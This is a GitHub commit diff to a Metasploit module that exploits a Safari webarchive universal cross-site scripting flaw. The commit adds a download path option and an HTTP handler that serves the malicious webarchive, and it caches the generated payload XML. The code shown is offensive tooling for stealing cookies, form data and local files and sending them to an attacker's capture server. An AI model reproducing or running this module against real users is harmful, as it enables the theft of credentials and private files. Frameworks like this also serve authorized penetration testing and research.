Skip to content

Commit d857b81

Browse files
author
Tod Beardsley
committed
Land rapid7#1777, usability fix for Safari module
2 parents 1d9a695 + 431cba8 commit d857b81

File tree

1 file changed

+30
-7
lines changed

1 file changed

+30
-7
lines changed

modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Lines changed: 30 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,8 @@ def initialize(info = {})
5050
OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive']),
5151
OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http://browserscan.rapid7.com/)']),
5252
OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
53+
OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive.', '/msf.webarchive']),
54+
OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
5355
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
5456
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
5557
OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@@ -143,7 +145,7 @@ def start_http(opts={})
143145
}.update(opts['Uri'] || {})
144146

145147
proto = (datastore["SSL"] ? "https" : "http")
146-
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
148+
print_status("Data capture URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
147149

148150
if (opts['ServerHost'] == '0.0.0.0')
149151
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
@@ -153,6 +155,20 @@ def start_http(opts={})
153155
@service_path = uopts['Path']
154156
@http_service.add_resource(uopts['Path'], uopts)
155157

158+
# Add path to download
159+
uopts = {
160+
'Proc' => Proc.new { |cli, req|
161+
resp = Rex::Proto::Http::Response::OK.new
162+
resp['Content-Type'] = 'application/x-webarchive'
163+
resp.body = @xml.to_s
164+
cli.send_response resp
165+
},
166+
'Path' => webarchive_download_url
167+
}.update(opts['Uri'] || {})
168+
@http_service.add_resource(webarchive_download_url, uopts)
169+
170+
print_status("Download URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
171+
156172
# As long as we have the http_service object, we will keep the ftp server alive
157173
while @http_service
158174
select(nil, nil, nil, 1)
@@ -176,9 +192,10 @@ def on_request_uri(cli, request)
176192

177193
# @return [String] contents of webarchive as an XML document
178194
def webarchive_xml
179-
xml = webarchive_header
180-
urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
181-
xml << webarchive_footer
195+
return @xml if not @xml.nil? # only compute xml once
196+
@xml = webarchive_header
197+
urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
198+
@xml << webarchive_footer
182199
end
183200

184201
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +305,9 @@ def webarchive_footer
288305
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
289306
# [a encodeObject:response forKey:@"WebResourceResponse"];
290307
def web_response_xml(script)
291-
# this is a binary plist, but im too lazy to write a real encoder.
292-
# ripped this straight out of a safari webarchive save.
308+
# this is a serialized NSHTTPResponse, i'm too lazy to write a
309+
# real encoder so yay lets use string interpolation.
310+
# ripped this straight out of a webarchive save
293311
script['content-length'] = script[:body].length
294312
whitelist = %w(content-type content-length date etag
295313
Last-Modified cache-control expires)
@@ -711,7 +729,7 @@ def all_script_urls(pages)
711729
end
712730
end
713731

714-
# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
732+
# @return [Array<Array<Hash>>] list of headers returned by cacheable remote javascripts
715733
def find_cached_scripts
716734
cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
717735
begin
@@ -780,6 +798,11 @@ def backend_url
780798
"#{proto}://#{myhost}#{port_str}"
781799
end
782800

801+
# @return [String] URL that serves the malicious webarchive
802+
def webarchive_download_url
803+
datastore["DOWNLOAD_PATH"]
804+
end
805+
783806
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
784807
# via the FILE_URLS module option.
785808
def interesting_file_urls

0 commit comments

Comments
 (0)